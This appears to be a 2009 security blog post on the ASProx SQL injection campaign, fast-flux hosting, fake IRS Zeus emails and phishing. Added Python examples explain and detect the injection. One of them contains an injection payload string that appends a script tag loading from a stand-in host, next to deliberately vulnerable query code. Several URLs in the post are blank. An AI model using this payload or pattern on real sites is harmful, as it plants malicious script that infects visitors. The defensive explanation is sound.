Thursday, October 01, 2009

Cyber Security Awareness Month: Day One

The Department of Homeland Security has designated the month of October to be Cyber Security Awareness Month, and we are off with a bang!

ASProx Compromised Webpages

Last night we received word that the ASProx SQL injection attack was back in full swing. After several months of no activity, the botnet is back to its old trick: attacking vulnerable ASP pages on IIS servers with SQL injection so that the underlying Microsoft SQL Server database is rewritten to add a malicious JavaScript link to otherwise legitimate web pages.
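To make that mechanism concrete, here is an added example (my own Python/SQLite sketch, not ASProx's payload and not any affected site's code) of the pattern behind a mass SQL injection of this kind: an ASP-style lookup that pastes a query-string value straight into its SQL, an injected batch that appends a script tag to stored page content, the same lookup with input validation and a bound parameter, and the check a site owner wants afterwards, a query for script tags in stored content. The table, rows, the host name `malicious.example.invalid` and the payload string are all constructed; the real ASProx payload was hex-encoded and walked every text column in the database, while this stand-in appends to one column.

```python
import sqlite3

# Placeholder for the injected host; the real one is not reproduced on this page.
INJECTED_HOST = "malicious.example.invalid"

# Simplified stand-in for the ASProx batch: the numeric id the page expects, then a
# second statement that appends a script tag to every stored body. SQLite concatenates
# strings with ||; the SQL Server original used +.
ASPROX_STYLE_PAYLOAD = (
    "1; UPDATE pages SET body = body || "
    f"'<script src=\"http://{INJECTED_HOST}/js.js\"></script>'; --"
)


def build_db() -> sqlite3.Connection:
    """Constructed sample data: a tiny CMS table of the kind these attacks rewrote."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    conn.executemany(
        "INSERT INTO pages (id, title, body) VALUES (?, ?, ?)",
        [
            (1, "Home", "<p>Welcome to our site.</p>"),
            (2, "About", "<p>We sell widgets.</p>"),
            (3, "Contact", "<p>Call us.</p>"),
        ],
    )
    conn.commit()
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, page_id: str) -> None:
    """The pattern ASProx exploited: request input pasted straight into SQL.

    executescript() is used because, like the SQL Server driver behind a classic ASP
    page, it runs a batch of statements; stacked queries are what the attack relies on.
    """
    conn.executescript(f"SELECT title, body FROM pages WHERE id = {page_id}")


def lookup_hardened(conn: sqlite3.Connection, page_id: str):
    """Validate the type the page actually expects, then bind it as a parameter."""
    if not page_id.isdigit():
        raise ValueError(f"rejected non-numeric page id: {page_id!r}")
    return conn.execute(
        "SELECT title, body FROM pages WHERE id = ?", (int(page_id),)
    ).fetchone()


def find_injected(conn: sqlite3.Connection) -> list:
    """Post-incident check: which stored pages now carry an injected script tag?"""
    rows = conn.execute(
        "SELECT id FROM pages WHERE body LIKE '%<script src=%' ORDER BY id"
    ).fetchall()
    return [row[0] for row in rows]


if __name__ == "__main__":
    db = build_db()
    lookup_vulnerable(db, ASPROX_STYLE_PAYLOAD)
    print("pages injected via string concatenation:", find_injected(db))

    db = build_db()
    try:
        lookup_hardened(db, ASPROX_STYLE_PAYLOAD)
    except ValueError as err:
        print("hardened lookup refused the payload:", err)
    print("pages injected via bound parameter:", find_injected(db))
```

The hardened version rejects the payload before any SQL runs, and even if a non-numeric value slipped through, a bound parameter is sent as data rather than parsed as a second statement. The `find_injected` query is the same idea as searching a real database's text columns for the injected tag after an incident, which is how most victims of this campaign discovered the damage.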

The main site hosting the malicious code right now is "". Sites compromised by this attack tool contain a tag that leads to the page "". A quick Google search for this string currently reveals thousands of web pages that have had this code injected.

The JavaScript loads an IFRAME, which in turn loads the following file:

That domain was registered on September 29th with the email address

I wasn't sure if I should try my malware analysis VM 30,000 feet over Wichita, Kansas, but I gave it a shot. The index.php file downloads a hostile Flash Player file:


That file is only 797 bytes. VirusTotal shows 1 of 41 engines detecting it, with Symantec calling it "Bloodhound.Exploit.266". The MD5 is 148a8c05fb0b63f036f024e2104a6e4c.

The index.php file also causes a malicious PDF file to be downloaded. When the PDF is opened with an older version of Adobe Reader, the computer becomes infected with one of the "scareware" fake anti-virus products.

Unfortunately, I don't have a vulnerable copy of Adobe Flash Player handy, so I can't tell you yet what is downloaded by this flash file.

Let's take a search-engine-agnostic approach for a moment, though: shows pages injected with: lists these as the top sites injected with "":

Yahoo! lists only 823 results on with top hits being:

AOL's search gives a number of results for "". One thing that cracks me up is the "sponsored links"! Can someone possibly have bought AdWords for that? When I search the path for this hostile Russian-hosted JavaScript attack tool, I am told that:

"Apartments in El Paso, TX"
" The Safest Site in Online Dating"
"Tv Ads, Create & Run Video Ads Online"

are sponsored links for that search.

The domain names involved in this scam are all fast-flux hosted: the names resolve to a constantly changing set of IP addresses belonging to botnet-infected machines, and those machines proxy the traffic on to the "real" criminal server. Here are some recently used IP addresses. If anyone recognizes that botnet, please shoot me an email:
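The "resolves to botnet machines" part can be checked from the outside: repeated lookups of a fast-flux name return short TTLs and a stream of different addresses scattered across unrelated networks, whereas a legitimate CDN also rotates addresses with short TTLs but within a few networks. As an added example (my own code, not the tooling behind this post), the Python below scores constructed DNS observations with that heuristic. The domain names, TTLs and 10.x addresses are placeholders, not the addresses the post lists; the /16 grouping is a crude stand-in for "different provider", and the thresholds are illustrative.

```python
import ipaddress
from collections import defaultdict

# Constructed DNS observations: (domain, ttl_seconds, A-record answers), one per query.
# Names and addresses are placeholders, not the ones behind the attack described above.
OBSERVATIONS = [
    ("flux.example.invalid", 180, ["10.11.4.20", "10.57.200.3", "10.99.13.77"]),
    ("flux.example.invalid", 180, ["10.3.64.9", "10.120.7.41", "10.204.88.5"]),
    ("flux.example.invalid", 180, ["10.17.250.12", "10.61.3.3", "10.142.9.90"]),
    ("flux.example.invalid", 180, ["10.8.111.2", "10.77.1.19", "10.230.46.8"]),
    ("cdn.example.invalid", 300, ["10.40.1.10", "10.40.1.11"]),
    ("cdn.example.invalid", 300, ["10.40.1.11", "10.40.1.12"]),
    ("cdn.example.invalid", 300, ["10.40.1.10", "10.40.1.12"]),
    ("cdn.example.invalid", 300, ["10.40.2.10", "10.40.1.11"]),
]


def summarize(observations):
    """Aggregate repeated lookups per domain into the features fast-flux detection uses."""
    ips = defaultdict(set)
    nets = defaultdict(set)
    ttls = defaultdict(list)
    for domain, ttl, answers in observations:
        ttls[domain].append(ttl)
        for ip in answers:
            ips[domain].add(ip)
            # /16 used as a crude proxy for "a different network or provider"
            nets[domain].add(ipaddress.ip_network(f"{ip}/16", strict=False))
    return {
        domain: {
            "lookups": len(ttls[domain]),
            "distinct_ips": len(ips[domain]),
            "distinct_slash16": len(nets[domain]),
            "min_ttl": min(ttls[domain]),
        }
        for domain in ttls
    }


def is_fast_flux(stats, min_ips=6, min_nets=4, max_ttl=600):
    """Heuristic: many distinct addresses spread over many networks, with short TTLs.

    A CDN also rotates addresses with short TTLs, but inside a handful of networks,
    so the network-diversity test is what separates the two cases here. Thresholds
    are illustrative, not tuned against real data.
    """
    return (
        stats["distinct_ips"] >= min_ips
        and stats["distinct_slash16"] >= min_nets
        and stats["min_ttl"] <= max_ttl
    )


def classify(observations):
    """Map each observed domain to True (looks fast-flux) or False."""
    return {d: is_fast_flux(s) for d, s in summarize(observations).items()}


if __name__ == "__main__":
    for domain, stats in summarize(OBSERVATIONS).items():
        print(domain, stats, "fast-flux" if is_fast_flux(stats) else "normal")
```

To gather real observations, query the name every minute or so for a while (`dig +noall +answer domain A` shows the TTL with each record) and record the answers; the telling sign is not any single lookup but how many unrelated addresses accumulate across them. Checking the ASN of each address instead of its /16 gives a far better diversity measure than the toy grouping above.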

IRS Version of Zeus

I'm actually blogging this using my free trial of Delta's "GoGo" Wi-Fi service as I fly back from San Jose, where I was speaking at the Merchant Risk Council meeting. What is the primary email that I'm downloading this morning? It's still the fake IRS emails being used to distribute the IRS version of the Zeus bot trojan.

So far this flight I've received 330 copies of the current IRS Zeus email. The domain names used in these emails are:

The binary it's dropping is brand new - I was the first one to have it scanned at VirusTotal. As usual with new binaries, detection is not very good: 9 of 41 antivirus products are currently detecting it, but at least we do have some of the big AV guns on board.

See the VirusTotal Report Here.

Detects from F-Secure, Kaspersky, McAfee, Microsoft, Sophos, Sunbelt, and VBA32 right now.

File size: 96256 bytes
MD5...: 36ac39070d175b21cb2f46e2bdfe668c

Don't Be a Phishing Victim

Today's BBC News quotes Rohyt Belani, the founder and chief executive of Intrepidus Group, a security consultancy:

"Our studies have shown that within the first hour of someone receiving a phishing e-mail, 60% of people click on them. That is not enough time for the security folks to act."

I agree with Rohyt totally, and would urge the consumer message of the day to be "BE CAREFUL with links in your email". If your bank really has an important message for you, go to your bank's website in the way you would normally log in, and do so. If there are important messages from your bank, you should be able to find them there easily.

Trying a new setting. After turning on comments, I got about 20-30 comments per day that were all link spam. Sorry to require login, but the spam was too much.